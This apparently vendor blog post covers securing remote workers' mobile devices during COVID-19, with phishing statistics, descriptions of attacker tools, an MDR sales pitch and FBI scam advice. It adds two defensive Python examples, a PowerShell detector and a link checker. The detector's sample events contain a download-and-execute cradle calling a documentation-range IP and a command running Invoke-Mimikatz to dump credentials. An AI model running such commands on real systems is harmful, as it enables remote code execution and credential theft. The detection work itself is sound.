With the proper tools and techniques in place, it’s possible to continue to defend your enterprise while your staff is working from home. Here are some good points to remember and share about securing mobile devices.
Now More Than Ever: Hackers Want Endpoints
Hackers understand the global pandemic we are currently experiencing. They also know that whatever you are NOT focused on defending is exactly where they will flow, like water, to get in.
Where are you not focused as a defender? That’s where the hacker will go.
Since working remotely has been mandated to slow the spread of COVID-19, focus on your users’ endpoints.
According to the 2019 Data Breach Investigations Report, 94% of malware is delivered by email. Be aware that even more users will click on malicious links when they are using their mobile devices.
Mobile Devices Users are More Vulnerable to Phishing Attacks
According to a recent mobile phishing report, the rate at which people fall for phishing attacks on mobile devices has been rising by 85% year over year.
Mobile devices are connected outside traditional firewalls, typically lack endpoint security solutions, and access a plethora of new messaging platforms not used on desktops. Additionally, the mobile user interface does not have the depth of detail needed to identify phishing attacks, such as hovering over hyperlinks to show the destination.
As a result, mobile users are three times more likely to fall for phishing scams, according to IBM.
Finally, the huge amount of personal and corporate data on mobile devices is making these devices the preferred target for phishing attacks.
In fact, despite being covered by traditional phishing protection and education, 56% of Lookout users received and tapped a phishing URL on their mobile device between 2011 and 2016. Fortunately, in these cases the attack was thwarted by Lookout.
Before enterprises can achieve comprehensive protection against phishing across all vectors, including mobile devices, security and IT professionals need to understand how current phishing myths muddy the waters, and get the facts that will help them make informed decisions about protecting corporate data.
It’s difficult for users to keep up with attackers’ capabilities. As an organization, you may have a team of security experts on hand who can research those capabilities and help you put a defense strategy in place. Attackers are using the following publicly available tools, the same ones highlighted by the UK’s NCSC and its partners, to breach endpoints and move through the networks behind them:
Remote Access Trojans (RAT)
A remote access Trojan (RAT) is a malware program that includes a back door for administrative control over the target computer. RATs are usually downloaded invisibly with a user-requested program — such as a game — or sent as an email attachment. Once the host system is compromised, the intruder may use it to distribute RATs to other vulnerable computers and establish a botnet. Source
Web Shells
A web shell is a script that can be uploaded to a web server to enable remote administration of the machine. Infected web servers can be either Internet-facing or internal to the network, where the web shell is used to pivot further to internal hosts.
A web shell can be written in any language that the target web server supports. The most commonly observed web shells are written in languages that are widely supported, such as PHP and ASP. Perl, Ruby, Python, and Unix shell scripts are also used. Source
Credential Stealers
Mimikatz is a leading post-exploitation tool that dumps passwords from memory, as well as hashes, PINs and Kerberos tickets. It also enables attacks such as pass-the-hash, pass-the-ticket and forging Kerberos Golden Tickets. This makes post-exploitation lateral movement within a network easy for attackers. Source
Lateral Movement Frameworks
PowerShell Empire is a unique attack framework in that its capabilities and behaviors closely resemble those used by current nation-state advanced persistent threat actors.
Nation-state hacking groups were using PowerShell to create fileless malware that runs in a computer’s memory, without leaving traces on disk, and using PowerShell scripts as a post-exploitation vector for moving through networks and inside workstations without triggering security alerts.
Because PowerShell is installed by default on Windows 7 and later, it was, at the time, trusted by security products, many of which did not detect PowerShell-based attacks.
Empire’s use among cybercriminals has grown so much in the past few years that in late 2018, the UK’s National Cyber Security Centre included Empire on its shortlist of the five most dangerous publicly available hacking tools, together with JBiFrost, Mimikatz, China Chopper, and HTran. Source
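The PowerShell tradecraft described above, and the Mimikatz credential dumping covered a few paragraphs earlier, leaves a trail in process-creation telemetry once command lines are being recorded: the stager typically launches powershell.exe with profile and window suppressed and the payload hidden behind -EncodedCommand. The following Python is an added example, not code from the original page, Cybriant, or the NCSC report. It decodes -EncodedCommand blobs and scores constructed process-creation events against an assumed, weighted indicator list; the events, hostnames, users, the IP 203.0.113.10 (a documentation range) and the weights are all constructed for illustration and are not signatures of any particular framework.

```python
"""Flag fileless PowerShell tradecraft in constructed process telemetry.

Added example (not from the original page, Cybriant, or any vendor tool):
the events below are constructed and the indicator list is an assumption
about what generic PowerShell download-and-execute activity looks like.
"""
import base64
import re

# Assumed indicators with weights; alert when the summed weight reaches 3.
INDICATORS = {
    "download_cradle": (re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest", re.I), 3),
    "invoke_expression": (re.compile(r"\bIEX\b|Invoke-Expression", re.I), 2),
    "evasive_switches": (re.compile(r"-(?:NoP(?:rofile)?|NonI(?:nteractive)?|W(?:indowStyle)?\s+Hidden)\b", re.I), 2),
    "execution_policy_bypass": (re.compile(r"-E(?:xecutionPolicy|p)\s+Bypass", re.I), 1),
    "inline_base64": (re.compile(r"FromBase64String", re.I), 1),
    "credential_access": (re.compile(r"Invoke-Mimikatz|sekurlsa::", re.I), 5),
    "amsi_tamper": (re.compile(r"AmsiUtils|amsiInitFailed", re.I), 4),
}
ALERT_THRESHOLD = 3

# -EncodedCommand and the abbreviations PowerShell accepts (-e, -ec, -en, -enc ...), then base64.
ENCODED_ARG = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def encode_powershell(script):
    """Encode a script the way -EncodedCommand expects it: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line):
    """Return the script hidden behind -EncodedCommand, or None if absent or undecodable."""
    match = ENCODED_ARG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event):
    """Score one process-creation record on its visible and decoded command line."""
    text = event["command_line"]
    decoded = decode_encoded_command(text)
    if decoded:
        text = text + "\n" + decoded  # inspect the decoded payload, not just the blob
    hits = [name for name, (pattern, _) in INDICATORS.items() if pattern.search(text)]
    score = sum(INDICATORS[name][1] for name in hits)
    return {
        "id": event["id"], "host": event["host"], "user": event["user"],
        "decoded": decoded, "hits": hits, "score": score,
        "alert": score >= ALERT_THRESHOLD,
    }


def triage(events):
    return [analyze_event(e) for e in events]


# Constructed download cradle used to build a realistic encoded command line.
CONSTRUCTED_CRADLE = (
    "$wc=New-Object System.Net.WebClient;"
    "$wc.Headers.Add('User-Agent','Mozilla/5.0');"
    "IEX $wc.DownloadString('http://203.0.113.10/index.asp')"
)

# Constructed process-creation events (Sysmon Event 1 / Security 4688 shape), not real telemetry.
SAMPLE_EVENTS = [
    {"id": 1, "host": "WS01", "user": "CORP\\jdoe",
     "command_line": "powershell.exe -NoP -NonI -W Hidden -Enc " + encode_powershell(CONSTRUCTED_CRADLE)},
    {"id": 2, "host": "WS02", "user": "CORP\\itadmin",
     "command_line": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"},
    {"id": 3, "host": "WS03", "user": "CORP\\jdoe",
     "command_line": "powershell.exe -c \"Get-ChildItem C:\\Users\\jdoe\\Documents\""},
    {"id": 4, "host": "SRV01", "user": "CORP\\svc_backup",
     "command_line": ("powershell.exe -NoP -c \"IEX (New-Object Net.WebClient)"
                      ".DownloadString('http://203.0.113.10/a'); Invoke-Mimikatz -DumpCreds\"")},
]

if __name__ == "__main__":
    for result in triage(SAMPLE_EVENTS):
        flag = "ALERT" if result["alert"] else "ok   "
        print(f"{flag} event={result['id']} host={result['host']} score={result['score']} hits={result['hits']}")
```

Events 1 and 4 alert; event 2 (an admin running a script with -ExecutionPolicy Bypass) scores below the threshold on its own, which is the point of weighting: a single weak indicator is noise, a download cradle plus Invoke-Expression plus suppressed window is not. The decoding step matters because signature matching on the raw command line would see only base64.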
C2 Obfuscation Tools
Attackers will often want to disguise their location when compromising a target. To do this, they may use generic privacy tools (e.g., Tor) or more specific tools to obfuscate their location.
HUC Packet Transmitter (HTran) is a proxy tool used to intercept and redirect Transmission Control Protocol (TCP) connections from the local host to a remote host. This makes it possible to obfuscate an attacker’s communications with victim networks. The tool has been freely available on the internet since at least 2009.
HTran facilitates TCP connections between the victim and a hop point controlled by a threat actor. Malicious threat actors can use this technique to redirect their packets through multiple compromised hosts running HTran to gain greater access to hosts in a network. Source
How to Protect Mobile Devices for Remote Workers
For a comprehensive mobile device protection strategy, you need a tool or service for endpoints that offers antivirus, EDR-style recording and logging of endpoint activity for future forensics, and vulnerability management for mobile.
Your mobile device security strategy should provide phishing protection for:
– Social Media
– Messaging Apps
You should also consider Mobile Threat Defense that defends against:
– Application Threats
– Device Threats
– Network Threats
Managed Detection and Remediation (MDR) for Endpoint Security
Not only does MDR from Cybriant help reduce the time between breach and detection, we can also help stop the threat before it can fully execute.
Our experts utilize a static AI engine to provide pre-threat execution protection. The static AI engine replaces traditional signatures and obviates recurring scans that kill end-user productivity.
By tracking all processes, our team is able to detect malicious activities, and use behavioral AI technology to respond at top speed. We can detect and stop file-based malware, scripts, weaponized documents, lateral movement, file-less malware, and even zero-days.
With MDR from Cybriant, our security analysts monitor your endpoints 24/7 and filter out false positives. You’ll receive the alerts when relevant threats are detected along with advice and insight from our cyber security team to help you mitigate and respond to the threat.
As an extension of your team, our experts will investigate, triage, and remediate security events and provide executive-level reporting. Remediation may reveal dormant or trojan threat actors that evade network and endpoint detection solutions. Our MDR solution includes leveraging the talents of our experienced team as well as next-generation antivirus and EDR tools that utilize AI.
The MDR service from Cybriant will allow you to protect your organization’s data and reduce your threat landscape against the most advanced threats.
Security Fundamentals for Working Remotely
Consider sharing this information from InfraGard with all your remote workers. Stay up-to-date on Coronavirus scams here.
Cyber Risks/Criminals: The FBI reports scammers are leveraging the COVID-19 pandemic to steal your money and your personal information, or both. Protect yourself and do your research before clicking on links purporting to provide information on the virus; donating to a charity online or through social media; contributing to a crowdfunding campaign; purchasing products online; or giving up your personal information to receive money or other benefits.
The FBI advises you to be on the lookout for the following:
FAKE CDC EMAILS – Watch out for emails claiming to be from the Centers for Disease Control and Prevention (CDC) or other organizations claiming to offer information on the virus. Do not click links or open attachments you do not recognize. Fraudsters can use links in emails to deliver malware to your computer to steal personal information or to lock your computer and demand payment. Be wary of websites and apps claiming to track COVID-19 cases worldwide. Criminals are using malicious websites to infect and lock devices until payment is received.
PHISHING EMAILS – Look out for phishing emails asking you to verify your personal information to receive an economic stimulus check from the government. While talk of economic stimulus checks has been in the news cycle, government agencies are not sending unsolicited emails seeking your private information to send you money. Phishing emails may also claim to be related to charitable contributions, general financial relief, airline carrier refunds, fake cures and vaccines, and fake testing kits.
COUNTERFEIT TREATMENTS OR EQUIPMENT – Be cautious of anyone selling products that claim to prevent, treat, diagnose, or cure COVID-19. Be alert to counterfeit products such as sanitizing products and Personal Protective Equipment (PPE), including N95 respirator masks, goggles, full face shields, protective gowns, and gloves. More information on unapproved or counterfeit PPE can be found at www.cdc.gov/niosh. You can also find information on the U.S. Food and Drug Administration website, www.fda.gov and the Environmental Protection Agency website, www.epa.gov. Report counterfeit products at www.ic3.gov and to the National Intellectual Property Rights Coordination website at iprcenter.gov.
Best Practices for Companies: Attached is a one-page document, developed by InfraGard National Board Director Rusty Sailors and his company, listing best cyber practices for companies to adopt, to ensure their information is kept safe and secure at all times.
In addition to those recommendations, the FBI is reminding people to always use good cyber hygiene and security measures. By remembering the following tips, you can protect yourself and help stop criminal activity:
- Do not open attachments or click links within emails from senders you don’t recognize.
- Do not provide your username, password, date of birth, social security number, financial data, or other personal information in response to an email or robocall.
- Always verify the web address of legitimate websites and manually type them into your browser.
- Check for misspellings or wrong domains within a link (for example, an address that should end in “.gov” ends in “.com” instead).
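The point made earlier about the mobile user interface (no hover to reveal where a link really goes) and the FBI’s advice to verify the web address and check for wrong domains can be turned into a mechanical check that runs on the href itself. The following Python is an added example, not from the original page, the FBI, or Cybriant. The trusted-domain allow-list, the sample links and the last-two-labels heuristic for the registrable domain are assumptions; the heuristic is wrong for suffixes such as co.uk, where production code should consult the Public Suffix List.

```python
"""Inspect a link the way a desktop hover would, for users who cannot hover.

Added example (not from the original page, the FBI, or Cybriant): the
trusted-domain list is an assumed allow-list and the registrable-domain
heuristic (last two labels) is an assumption; use the Public Suffix List
in production.
"""
import ipaddress
import re
from urllib.parse import urlsplit

TRUSTED_DOMAINS = {"irs.gov", "cdc.gov", "fda.gov"}  # assumed allow-list

# Display text is treated as a URL/host only if it actually looks like one.
HOSTLIKE = re.compile(r"^(?:[a-z][a-z0-9+.-]*://)?[a-z0-9.-]+\.[a-z]{2,}(?:[/:?#].*)?$", re.I)


def registrable_domain(host):
    """Last two labels (assumption: fine for .gov/.com, wrong for co.uk and friends)."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def host_of(text):
    """Hostname from a URL or bare host in display text; '' if the text is just words."""
    text = text.strip()
    if not HOSTLIKE.match(text):
        return ""
    if "://" not in text:
        text = "http://" + text
    return (urlsplit(text).hostname or "").lower()


def inspect_link(href, display_text=None, trusted=TRUSTED_DOMAINS):
    """Return the real host of a link plus the phishing tells found on it."""
    parts = urlsplit(href.strip())
    host = (parts.hostname or "").lower()
    findings = []
    if parts.scheme.lower() != "https":
        findings.append("scheme_not_https")
    if parts.username is not None:  # https://irs.gov@203.0.113.5/ lands on the IP, not on irs.gov
        findings.append("credentials_in_url")
    if not host:
        findings.append("no_host")
    elif is_ip_literal(host):
        findings.append("raw_ip_host")
    else:
        if any(label.startswith("xn--") for label in host.split(".")):
            findings.append("punycode_label")  # homograph candidate; show the xn-- form to the user
        if registrable_domain(host) not in trusted:
            for t in sorted(trusted):
                # catches irs.gov.com, www.irs.gov.example.net and irs-gov.com
                if t in host or t.replace(".", "-") in host:
                    findings.append("lookalike_of_" + t)
                    break
    if display_text:
        shown = host_of(display_text)
        if shown and host and registrable_domain(shown) != registrable_domain(host):
            findings.append("display_mismatch")  # the text names one site, the href goes elsewhere
    return {"host": host, "findings": findings, "suspicious": bool(findings)}


def triage_links(pairs):
    return [inspect_link(href, text) for href, text in pairs]


# Constructed (href, visible text) pairs in the shape of links from a COVID-themed lure.
SAMPLE_LINKS = [
    ("https://www.irs.gov/coronavirus", "www.irs.gov"),
    ("http://irs.gov@203.0.113.5/refund", "Claim your stimulus refund"),
    ("https://www.irs.gov.com/stimulus", "www.irs.gov"),
    ("https://www.xn--cdc-gov-example.com/track", "https://www.cdc.gov/covid-tracker"),
    ("https://www.cdc.gov/coronavirus", "Latest case counts"),
]

if __name__ == "__main__":
    for (href, text), r in zip(SAMPLE_LINKS, triage_links(SAMPLE_LINKS)):
        print("SUSPICIOUS" if r["suspicious"] else "ok        ", r["host"], r["findings"], "<-", text)
```

The second sample is the one a phone screen hides best: the visible part of the address starts with irs.gov, but everything before the @ is userinfo and the browser connects to 203.0.113.5. The same logic can sit in a mail gateway rewriting links or in a mobile threat defense agent; the output is the real host and a list of reasons, which is what the user never gets to see on a small screen.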
As organizations around the world respond to the sudden need for remote work options, we’re here to provide guidance and stability during these trying times.
Whether provisioning corporate laptops or allowing employees to use personal devices, hastily extending a remote work option can leave your organization vulnerable in terms of security.
Here are a few items to consider:
– A computer
– A secure internet connection
– Chat and conferencing applications
– A dedicated workspace
– A phone and a camera
– Self-motivation and discipline
– A strict routine
Require VPN access for internal networks
A VPN encrypts traffic between the remote worker and the corporate network, protecting it from eavesdroppers and man-in-the-middle attacks on untrusted networks such as home or public Wi-Fi.
Update Password Policies
Make sure your employees understand and comply with your password policies. This may be the right time to roll out new, unique, strong passwords across the company.
Separate User Account
If your staff are using their own devices, require a new user account to be set up for work use only. This separation helps both privacy and security.
Invest in full-featured endpoint security for home workers
Home systems are varied and, more often than not, are not up to the job of protecting your company’s assets. The best option is still business-class endpoint security that your IT team can manage centrally and that includes a firewall, protection from malicious websites, and anti-malware.
Require multi-factor authentication
Multi-factor authentication is your best defense against cyber criminals who use brute-force techniques or stolen credentials.
Encrypt sensitive data on personal devices
If employees work on sensitive files or download files to their personal devices, provide an encryption solution and require that work files be kept separate from personal files.
Keep machines up to date
It is difficult to know how well employees keep their home machines up to date. Enable automatic updates on all of their systems to be sure they are current with security patches.
Refresh security awareness training
COVID-19 scams are on the rise and are becoming more sophisticated. Remote workers’ habits can become lax when it comes to clicking on links. Provide a refresher to counter the human element that cybercriminals attempt to exploit. Consider running a phishing simulation campaign and training course before employees begin working remotely, or shortly thereafter.